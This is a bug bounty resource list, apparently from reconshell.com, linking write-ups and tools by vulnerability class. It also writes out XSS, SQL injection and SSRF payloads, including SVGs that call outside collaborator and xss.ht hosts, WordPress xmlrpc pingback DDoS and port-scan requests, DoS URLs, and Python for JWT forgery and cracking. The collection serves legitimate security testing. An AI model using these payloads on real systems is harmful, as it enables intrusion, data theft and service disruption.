Bug Bounty Resources
2021-11-07 15:33:07 Author: reconshell.com

Bug Bounty

Write-ups of all types of bugs

Bug bounty write-ups and exploit resources

2FA

1. 2FA bypass techniques (mind map)
https://www.mindmeister.com/1736437018?t=SEeZOmvt01

2. Two-factor authentication security testing and possible bypasses
https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35

403 Forbidden Bypass

https://dewangpanchal98.medium.com/403-forbidden-bypass-fc8b5df109b7

AEM application vulnerabilities

https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=9

AWS-S3-Bucket

Testing for unauthorized file uploads on misconfigured AWS S3 buckets
https://alph4byt3.medium.com/testing-for-unauthorized-file-uploads-on-misconfigured-aws-s3-buckets-c114f7653893

AWS pentesting
https://infosecwriteups.com/deep-dive-into-aws-penetration-testing-a99192a26898

Bypassing and exploiting Bucket Upload Policies and Signed URLs
https://labs.detectify.com/2018/08/02/bypassing-exploiting-bucket-upload-policies-signed-urls/

How To Scan AWS's Entire IP Range to Recon SSL Certificates
https://www.daehee.com/scan-aws-ip-ssl-certificates/

Adding email checklist

Adding email checklist
https://docs.google.com/presentation/d/18EROY7aLfy6omx3-KTjUnAfOuh3UP5UiAnSc__uuRV4/mobilepresent?slide=id.ge49d443037_0_310

Auto-Recon

Rengine

https://github.com/yogeshojha/rengine#quick-installation

CSV-Injection

Bug in Export to Spreadsheet functionality in web applications

1. Details
https://www.contextis.com/en/blog/comma-separated-vulnerabilities

2. Hackerone Report
https://hackerone.com/reports/928280
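The export bug described above, as an added example (not code from the linked Context post or the HackerOne report): a spreadsheet export that writes cells verbatim next to one that neutralises formula-looking cells, plus the check a tester runs over an exported file. The sample rows are constructed; the attacker value is the kind of string stored in a profile field and later exported by an admin.

```python
import csv
import io

# Leading characters that make Excel, LibreOffice and Google Sheets evaluate a cell
# as a formula. Tab and carriage return are included because some importers treat
# them as cell separators.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample rows: the second name is the kind of value an attacker saves in
# a profile field hoping an admin will later export the table to a spreadsheet.
SAMPLE_ROWS = [
    {"name": "alice", "note": "ok"},
    {"name": '=HYPERLINK("http://attacker.example/?"&A1,"click")', "note": "-2+3"},
    {"name": "bob", "note": "@SUM(1,2)"},
]


def export_vulnerable(rows):
    """Writes every cell exactly as stored, so '=HYPERLINK(...)' becomes a formula."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=["name", "note"], lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


def neutralise_cell(value):
    """Prefix a formula-looking cell with a single quote so the spreadsheet shows it
    as text (the OWASP recommendation). The csv module doubles any embedded double
    quotes itself, so the quoted field cannot be closed early by the payload."""
    if isinstance(value, str) and value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def export_hardened(rows):
    """Same export with every untrusted cell passed through neutralise_cell()."""
    buf = io.StringIO()
    writer = csv.DictWriter(
        buf, fieldnames=["name", "note"], quoting=csv.QUOTE_ALL, lineterminator="\n"
    )
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralise_cell(v) for k, v in row.items()})
    return buf.getvalue()


def formula_cells(csv_text):
    """Tester's side: list the cells in an export that a spreadsheet would evaluate."""
    found = []
    for row in csv.reader(io.StringIO(csv_text)):
        found.extend(cell for cell in row if cell.startswith(FORMULA_TRIGGERS))
    return found
```

Apply the neutralisation only to untrusted string columns: a legitimate numeric column exported as "-2" would otherwise be turned into text.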

CVES

CVE-2020-11022/CVE-2020-11023
https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html

CVE-2020-11110
https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html

Version: Grafana v6.2.5

Authentication: not required on v6.2.5 (the snapshot API is reachable unauthenticated)

Send a POST request to /api/snapshots with the following JSON body; the javascript: URL in originalUrl is the stored XSS payload

{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}

CVE-2021-24169

WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)

wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>

CVE-2021-40875

Improper access control in Gurock TestRail versions <= 7.2.0.3014 results in sensitive file exposure

The /files.md5 file is served to the client side of a Gurock TestRail application, disclosing the full list of application files and their paths. Those paths can then be requested directly and, in some cases, disclose hardcoded credentials, API keys, or other sensitive data.

CVE-2021-26084

Remote Code Execution on Confluence Servers

https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

Contact-support-page

1. Target Contact page tips
https://docs.google.com/presentation/d/1wqx9fnr9v451FHdU33XeXBIg3b_pfhF9X0ttkydrGlk/mobilepresent?slide=id.gb07b8690e7_0_156

Create/edit/remove organisation checklist

Checklist

https://docs.google.com/presentation/d/1E5zjGcnqSe7asDreGPgBS2T-bAJ5siuE0QKvJnX91Cw/mobilepresent?slide=id.ge2f51227b3_0_158

Cross-Site WebSocket Hijack

Cross-Site WebSocket Hijack
https://github.com/DeepakPawar95/cswsh

https://sunilyedla.medium.com/websocket-hijacking-to-steal-session-id-of-victim-users-bca84243830

DNS-misconfiguration

Dns misconfig details
https://resources.infosecinstitute.com/topic/dns-hacking/

Misconfigure Zone transfer
https://www.cybrary.it/blog/0p3n/find-dns-zone-transfer-misconfiguration/

DOS

1. denial of service with web cache poisoning
https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning

2. DOS using
(((((()0)))))

https://hackerone.com/reports/993582

Email_Injection

https://pentestbook.six2dez.com/enumeration/web/email-attacks

File-Upload

1.
https://blog.yeswehack.com/yeswerhackers/exploitation/file-upload-attacks-part-1/

2.
https://thevillagehacker.medium.com/remote-code-execution-due-to-unrestricted-file-upload-153be0009934

3.
https://secgeek.net/bookfresh-vulnerability/

4.
https://infosecwriteups.com/bragging-rights-killing-file-uploads-softly-fba35a4e485a

https://portswigger.net/kb/issues/00500980_file-upload-functionality

https://labs.detectify.com/2015/05/28/building-an-xss-polyglot-through-swf-and-csp/

https://hackerone.com/reports/191380

https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/mobilepresent?slide=id.ga2ef157b83_0_156
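The server-side checks that close the upload bugs in the write-ups above, as an added example written for this page (not code from any of the linked posts): a filename sanitiser that defeats path traversal and double extensions, a magic-byte check so a PHP file cannot pass as a PNG, and a structural check that rejects SVGs carrying script, event handlers or external references (the building blocks of the stored XSS and SSRF payloads later on this page). The sample files are constructed.

```python
import os
import re
import xml.etree.ElementTree as ET

# Allowed extensions mapped to the bytes a genuine file of that type starts with.
# SVG is text, so it gets a structural check instead of a magic-byte check.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
    ".svg": None,
}

# Elements that execute code, pull remote content or embed HTML inside an SVG.
SVG_ACTIVE_TAGS = {"script", "foreignobject", "use", "image", "set", "animate"}


def safe_name(filename):
    """Keep only a plain basename with a single extension, or return None."""
    base = os.path.basename(filename.replace("\\", "/"))
    base = re.sub(r"[^A-Za-z0-9._-]", "_", base)
    root, ext = os.path.splitext(base)
    if not root or not ext:
        return None
    # Collapse inner dots so shell.php.png is stored as shell_php.png; Apache's
    # mod_mime would otherwise still hand the original name to PHP.
    return root.replace(".", "_") + ext.lower()


def svg_is_dangerous(data):
    """True if the SVG contains script, event handlers, hrefs or javascript: URLs."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return True  # unparsable input is rejected rather than guessed at
    for el in root.iter():
        tag = el.tag.split("}")[-1].lower()  # strip the namespace
        if tag in SVG_ACTIVE_TAGS:
            return True
        for attr, val in el.attrib.items():
            name = attr.split("}")[-1].lower()  # catches xlink:href as "href"
            if name.startswith("on") or name == "href" or val.strip().lower().startswith("javascript:"):
                return True
    return False


def validate_upload(filename, data):
    """Returns (True, stored_name) or (False, reason)."""
    name = safe_name(filename)
    if name is None:
        return False, "bad filename"
    ext = os.path.splitext(name)[1]
    if ext not in ALLOWED:
        return False, "extension not allowed"
    magic = ALLOWED[ext]
    if magic is not None:
        if not data.startswith(magic):
            return False, "content does not match extension"
        # Valid image header followed by PHP is the classic polyglot used for RCE
        # on servers that execute by extension or by content sniffing.
        if b"<?php" in data:
            return False, "embedded server-side script"
        return True, name
    if svg_is_dangerous(data):
        return False, "svg contains active content"
    return True, name


# Constructed samples.
PNG_OK = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_AS_PNG = b"\x89PNG\r\n\x1a\n<?php system($_GET['c']); ?>"
SVG_XSS = b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>'
SVG_OK = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>'
```

Serve accepted files from a separate host or path with no script execution and a fixed Content-Type; the validator reduces what gets stored, it does not make an executable upload directory safe.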

Firebase-Database-Takeover

Firebase Database Takeover
https://danangtriatmaja.medium.com/firebase-database-takover-b7929bbb62e1

https://medium.com/@fs0c131y/how-i-found-the-database-of-the-donald-daters-app-af88b06e39ad

Get-into-BugBounty

Vickie Li writeup
https://medium.com/swlh/mastering-the-skills-of-bug-bounty-2201eb6a9f4

Graphql

Exploiting graphql
https://blog.assetnote.io/2021/08/29/exploiting-graphql/

HTTP-method-testing

1. Http method testing by owasp
https://wiki.owasp.org/index.php/Test_HTTP_Methods_(OTG-CONFIG-006)

Hunting-on-aspx-application

1. Hunting on ASPX Application For P1's [Unauthenticated SOAP,RCE, Info Disclosure]
https://0u.ma/m/3

ICMP Attacks

https://resources.infosecinstitute.com/topic/icmp-attacks/

JIRA-exploit-resources

JIRA cve exploits
https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c

JS-analysis

1. Analysis of Client-Side JavaScript
https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288

2.
https://infosecwriteups.com/one-token-to-leak-them-all-the-story-of-a-8000-npm-token-79b13af182a3

3. linkfinder tool
https://github.com/GerbenJavado/LinkFinder

4. Tool to Find js from a web
https://github.com/robre/scripthunter

5. A JavaScript change-monitoring tool
https://github.com/robre/jsmon

6. URL tracking for changes
https://github.com/ahussam/url-tracker

7. Command-line tool that sends a Telegram notification to your phone when a long-running command (such as a scan) finishes
https://github.com/ShutdownRepo/telegram-bot-cli


JWT

1. JWT automated vulnerability scanner
https://hackerone.com/reports/993582
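The checks a JWT scanner performs, as an added example written for this page (not code from the linked report or from any scanner): decode the token without verifying it, forge the alg=none variant that a broken verifier accepts, and brute-force an HS256 signature offline against a wordlist. The sample token is minted here with a deliberately weak secret; the wordlist is constructed.

```python
import base64
import hashlib
import hmac
import json


def b64url_decode(s):
    """JWT segments drop the base64 padding; restore it before decoding."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def _segment(obj):
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def parse_jwt(token):
    """Decode header and payload without checking the signature (what a tester does first)."""
    head, body, sig = token.split(".")
    return json.loads(b64url_decode(head)), json.loads(b64url_decode(body)), sig


def make_hs256(payload, secret, header=None):
    """Mint an HS256 token; used here only to build the sample."""
    header = header or {"alg": "HS256", "typ": "JWT"}
    signing_input = _segment(header) + "." + _segment(payload)
    mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)


def forge_alg_none(token):
    """Same claims, alg set to none and an empty signature: a verifier that honours the
    header's alg field accepts this as valid."""
    header, payload, _ = parse_jwt(token)
    header = dict(header, alg="none")
    return _segment(header) + "." + _segment(payload) + "."


def crack_hs256(token, wordlist):
    """Offline brute force: return the secret that reproduces the signature, or None."""
    header, _, sig = parse_jwt(token)
    if header.get("alg") != "HS256":
        return None
    signing_input = token.rsplit(".", 1)[0].encode()
    target = b64url_decode(sig)
    for candidate in wordlist:
        mac = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return candidate
    return None


# Constructed sample: a token signed with a guessable secret, and a tiny wordlist.
SAMPLE_TOKEN = make_hs256({"sub": "1234", "role": "user"}, "secret")
WORDLIST = ["password", "changeme", "secret", "jwt"]
```

Once the secret is recovered, make_hs256() with an elevated claim (for example role=admin) produces the token that proves impact; the alg=none forgery is worth sending even when cracking fails, since it targets the verifier rather than the key.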

Java Deserialization

1. Java Deserialization scanner
https://github.com/joaomatosf/jexboss

Laravel-RCE

https://infosecwriteups.com/rce-on-a-laravel-private-program-2fb16cfb9f5c

Login_page

1. Login page checklist
https://docs.google.com/presentation/d/1lGMRCYJo9d66A3rIVNbTk3thn76uc9Gyp8Gpu9mZHQ8/mobilepresent?slide=id.gac49ca7b44_0_158

MY-Recon

Subdomain enumeration
subfinder -d domain.com -o file1.txt
assetfinder --subs-only domain.com > file2.txt
amass enum -d domain.com | tee -a file3.txt

Nginx

https://github.com/stark0de/nginxpwner

OAuth-Vulnerability

1. OAuth Checklist
https://www.binarybrotherhood.io/oauth2_threat_model.html

2. OAuth Misconfiguration in small time-window of attack
https://muhammad-aamir.medium.com/oauth-misconfiguration-found-in-small-time-window-of-attack-b585afcb94c6

3.
https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1

4. Oauth checklist
https://docs.google.com/presentation/d/1eu_b8jqrjr0OeetbrNHWPy9KCh8J1GEjuA4CeiRWokI/mobilepresent?slide=id.ga30804010b_0_0

5. Pre-Access to Victim’s Account via Facebook Signup
https://akshanshjaiswal.medium.com/pre-access-to-victims-account-via-facebook-signup-60219e9e381d

Reconnaissance

1.
https://infosecwriteups.com/guide-to-basic-recon-bug-bounties-recon-728c5242a115

2.
https://bendtheory.medium.com/finding-and-exploiting-unintended-functionality-in-main-web-app-apis-6eca3ef000af

3.
https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html

4.
OWASP Top 10: The Ultimate Guide
5. Recon by nahamsec
https://docs.google.com/presentation/d/15bdwuAJKwhVwlcijKOXZFI5ZTJT1PdcMUblJVu6dJyU/mobilepresent?slide=id.gc7305a35cd_0_119

6.
https://www.bugbountyhunter.com/mobile/tutorials-and-guides

7. Scope based Recon
https://blog.cobalt.io/scope-based-recon-smart-recon-tactics-7e72d590eae5

8. Mind Map
https://github.com/imran-parray/Mind-Maps

9. Github Recon
https://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2c82

10. Recon methodology by @xcheater
https://infosecwriteups.com/recon-methodology-for-bug-hunting-e623120a7ca6

11.
https://docs.google.com/presentation/d/18o6fwqZB8wqHFYl2M5SO5KMzct8NKVW7G3edgi0XXJk/mobilepresent?slide=id.ge4fdf9c97a_0_316

12. Pentester Land
https://pentester.land/cheatsheets/2019/04/15/recon-resources.html

SQL-Injection

1. SQL checklist
https://www.notion.so/SQL-INJECTION-e89cf8a972d24a239821b4449f34f4e0

2.
https://sapt.medium.com/sqli-on-a-bugcrowd-private-program-17858b57ec61

')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
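How the time-based payloads above are actually used, as an added example written for this page (not code from the linked write-ups): send each payload through a request function, compare the response time against a baseline, and only report a payload when the delay reproduces. Nothing here talks to a network; `simulate_vulnerable_target` is a constructed stand-in that sleeps the way a MySQL back end does for sleep() or an MSSQL back end does for WAITFOR DELAY, and `send` is whatever HTTP call you plug in.

```python
import time

DELAY = 5  # seconds the payloads on this page ask the database to sleep
PAYLOADS = [
    "')) or sleep(5)='",
    ";waitfor delay '0:0:5'--",
    ");waitfor delay '0:0:5'--",
    "';waitfor delay '0:0:5'--",
    "\";waitfor delay '0:0:5'--",
    "');waitfor delay '0:0:5'--",
    "\");waitfor delay '0:0:5'--",
    "));waitfor delay '0:0:5'--",
]


def timed(send, value):
    """Seconds taken by one request with `value` in the suspected parameter."""
    t0 = time.monotonic()
    send(value)
    return time.monotonic() - t0


def find_time_based(send, payloads=PAYLOADS, delay=DELAY, baseline_runs=3, confirm=2):
    """Return the payloads that reliably add `delay` seconds to the response.

    The baseline is the slowest of several benign requests, and a payload only
    counts when every one of `confirm` repeats exceeds baseline + 80% of the
    delay; a single slow response from network jitter is therefore not a hit."""
    baseline = max(timed(send, "benign") for _ in range(baseline_runs))
    threshold = baseline + delay * 0.8
    hits = []
    for payload in payloads:
        if all(timed(send, payload) >= threshold for _ in range(confirm)):
            hits.append(payload)
    return hits


def simulate_vulnerable_target(delay, backend="mysql"):
    """Constructed stand-in for an HTTP request against an injectable parameter.
    A MySQL back end honours sleep(); an MSSQL back end honours waitfor delay;
    anything else is not vulnerable. The `delay` here is shortened for testing."""
    def send(value):
        if backend == "mysql" and "sleep(" in value:
            time.sleep(delay)
        elif backend == "mssql" and "waitfor delay" in value:
            time.sleep(delay)
    return send
```

Which payloads fire tells you the database and the quoting context (for example `');` means the input sat inside a single-quoted value within parentheses), which is what the follow-up extraction queries need.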

SSO

1. SSO Checklist
https://docs.google.com/presentation/d/1bxBL0HyL8pbDUsa00abfbfEoawmx-XsVIkUjF_V2-_I/mobilepresent?slide=id.gaa585d4e81_0_156

SSRF

1. SSRF bible
https://docs.google.com/document/u/0/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/mobilebasic#h.3ndar9ni0n0h

2. Tips and tricks for ssrf
https://highon.coffee/blog/ssrf-cheat-sheet/#identifying-potential-locations-for-ssrf

3. SSRF payload in image upload
<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg width="200px" height="200px" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><image xlink:href="https://1y0ry36zsloshorypw4jca32mtsjg8.burpcollaborator.net/" x="0" y="0" height="200px" width="200px"/></svg>

4. Bypass by redirect through own server
https://infosecwriteups.com/an-exciting-journey-to-find-ssrf-bypass-cloudflare-and-extract-aws-metadata-fdb8be0b5f79

https://d0nut.medium.com/piercing-the-veal-short-stories-to-read-with-friends-4aa86d606fc5

SSTI

1. portswigger SSTI
https://portswigger.net/web-security/server-side-template-injection

2.
https://verneet.com/fuzzing-77-till-p1/

3.
https://gauravnarwani.com/injecting-6200-to-1200/

4. SSTI wordlist for fuzzing
https://github.com/err0rr/SSTI/blob/master/Wordlist


Scripting

Oneliner Script
https://github.com/dwisiswant0/awesome-oneliner-bugbounty#pure-bash-linkfinder

Setting-page-Checklist

1. Settings page checklist
https://docs.google.com/presentation/d/11Aa5PkGswQdZo3sLYbB8PAFfgGLocDpRujaGf5v6g70/mobilepresent?slide=id.gae8ab10c68_0_156

Shopping-Application

1. Vulnerabilities in shopping application
https://docs.google.com/presentation/d/1yMLYZbjERTeojwjve7Yh6Pojvljnl0UVAKTY9i-ZaSE/mobilepresent?slide=id.gb240823d22_0_155

Subdomain Enumeration

1. DNS subdomain scanner
https://github.com/rbsec/dnscan

2. Subdomain Enumeration
https://sidxparab.gitbook.io/subdomain-enumeration-guide/introduction/whats-the-need

Wordlist

1.collection of wordlist
https://github.com/heilla/SecurityTesting/blob/master/wordlists/Collection%20of%20wordlists.md

2. Dictionary list
https://gist.github.com/mrofisr/5010dcb4321c99329c932aaeb3172a8a

3. Common speak wordlist
https://github.com/pentester-io/commonspeak

WriteUps

1. hackerone
https://hackerone.com/hacktivity

2. Bugreader
https://bugreader.com/reports

3. Hackerone Reports poc videos
https://github.com/bminossi/AllVideoPocsFromHackerOne

4. Pentester Land
https://pentester.land/list-of-bug-bounty-writeups.html

5. Sillydaddy
https://www.sillydaddy.me/

XSS

1. Browser's XSS Filter Bypass Cheat Sheet
https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet

2. Stored XSS using file upload
https://medium.com/@vis_hacker/how-i-got-stored-xss-using-file-upload-5c33e19df51e

3. XSS Through Parameter Pollution
https://infosecwriteups.com/xss-through-parameter-pollution-9a55da150ab2

4. XSS via HTTP Headers
https://brutelogic.com.br/blog/xss-via-http-headers/

5. Blind XSS in svg file
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
  "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  <svg width="200"
       height="200"
       zoomAndPan="disable"
       xmlns="http://www.w3.org/2000/svg"
       xmlns:xlink="http://www.w3.org/1999/xlink"
       xml:space="preserve">
    <!-- Script linked from the outside-->
    <script xlink:href="https://smaul1.xss.ht" />
    <script>
      //<![CDATA[
        alert("Smaul");
      ]]>
    </script>
  </svg>

email-verification

1.
https://infosecwriteups.com/email-verification-bypass-a-strange-case-f38291866126

2. Email bounce
https://infosecwriteups.com/an-unexpected-bounty-email-bounce-issues-b9f24a35eb68

identify what something is

Identify anything. pyWhat easily lets you identify emails, IP addresses, and more
https://github.com/bee-san/pywhat

reset-password

https://docs.google.com/presentation/d/1QzBl3k3n2q44ULyfZgr_gPZexj8nF5vD8JrS5AUJRbs/mobilepresent?slide=id.gac68916404_0_19

tools

Subdomain Enum Tools
https://github.com/projectdiscovery/subfinder
https://github.com/OWASP/Amass
https://github.com/hannob/tlshelpers/blob/master/getsubdomain
https://github.com/tomnomnom/assetfinder

Get subdomains from IPs, generate permutations, and bulk-resolve them
https://github.com/SpiderLabs/HostHunter
https://github.com/infosec-au/altdns
https://github.com/ProjectAnte/dnsgen
https://github.com/blechschmidt/massdns
Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
https://github.com/lc/gau

Github Recon
https://github.com/techgaun/github-dorks
https://github.com/michenriksen/gitrob
https://github.com/eth0izzle/shhgit
https://github.com/anshumanbh/git-all-secrets
https://github.com/hisxo/gitGraber
Get alerted if a new subdomain appears on the target
https://github.com/yassineaboukir/sublert

1. Bug bounty tools by m4ll0k
https://github.com/m4ll0k/Bug-Bounty-Toolz

web-shell

https://github.com/tennc/webshell/blob/master/README_EN.md

WordPress

1. Exposed install wizard (setup-config.php)
/wp-admin returns a 403
/wp-admin/setup-config.php?step=1 may still be reachable
If it is, the installer has not been completed and lets you supply the database settings yourself, i.e. create the site's database configuration

2. xmlrpc.php
This is one of the most common findings on WordPress. To get paid for it you must exploit it fully and show the impact; the presence of the file alone is not a bug.

Detection
Visit site.com/xmlrpc.php
A GET request returns "XML-RPC server accepts POST requests only."
Exploit
Intercept the request and change the method from GET to POST
List all methods
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
Check whether the pingback.ping method is listed
Perform DDoS
pingback.ping(sourceURI, targetURI) makes the server fetch sourceURI to verify that it links to targetURI. The request below makes the site connect to your server, which proves the server-side request; putting a victim's URL in the first parameter instead, from many WordPress sites at once, is the pingback DDoS
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG POST FROM THE SITE ></string>
</value></param></params>
</methodCall>
Perform SSRF (internal port scan only)
Same call with an internal host and port as the first parameter; the fault code or the response time differs between open and closed ports
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<INTERNAL HOST >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG POST FROM THE SITE ></string>
</value></param></params>
</methodCall>
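Building and reading the XML-RPC messages from the steps above with the standard library, as an added example written for this page (not from any linked resource). The `system.listMethods` response is a constructed sample in the shape WordPress returns, so the block runs offline; sending the bodies to /xmlrpc.php with any HTTP client is assumed.

```python
import xmlrpc.client


def list_methods_body():
    """<methodCall> body for system.listMethods (the first request in the steps above)."""
    return xmlrpc.client.dumps((), methodname="system.listMethods")


def pingback_body(source_uri, target_uri):
    """pingback.ping(sourceURI, targetURI): the server fetches sourceURI to check that it
    links to targetURI, so sourceURI is the host you make the site connect to."""
    return xmlrpc.client.dumps((source_uri, target_uri), methodname="pingback.ping")


def exposed_methods(method_response_xml):
    """Parse a <methodResponse> to the set of method names it lists."""
    params, _ = xmlrpc.client.loads(method_response_xml)
    return set(params[0])


def risky_methods(method_response_xml):
    """The methods worth reporting: pingback.ping (SSRF / pingback DDoS) and
    system.multicall + wp.getUsersBlogs (hundreds of password guesses per request)."""
    names = exposed_methods(method_response_xml)
    return sorted(names & {"pingback.ping", "system.multicall", "wp.getUsersBlogs"})


# Constructed sample response, trimmed to a few of the methods a default install lists.
SAMPLE_RESPONSE = """<?xml version="1.0"?>
<methodResponse><params><param><value><array><data>
<value><string>system.multicall</string></value>
<value><string>system.listMethods</string></value>
<value><string>pingback.ping</string></value>
<value><string>wp.getUsersBlogs</string></value>
</data></array></value></param></params></methodResponse>"""
```

For the SSRF proof, pass your collaborator URL as `source_uri` and a real post URL as `target_uri`, then look for the incoming request; for the port scan, vary the port in `source_uri` and diff the fault strings.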

3. WP user enumeration
This is only accepted when the target hides its users, i.e. the usernames are not already public. An attacker can use the list for password brute-forcing and other attacks

Detection
Visit site.com/wp-json/wp/v2/users/
http://target.com/?author=1 (a default install redirects to /author/<username>/)
http://target.com/?rest_route=/wp/v2/users
You will see JSON data with user info in the response

4. Denial of Service via load-scripts.php
http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter
h1 report

5. Denial of Service via load-styles.php
http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic

6. Log files exposed
http://target.com/wp-content/debug.log

7. Backup file wp-config exposed
.wp-config.php.swp
wp-config.inc
wp-config.old
wp-config.txt
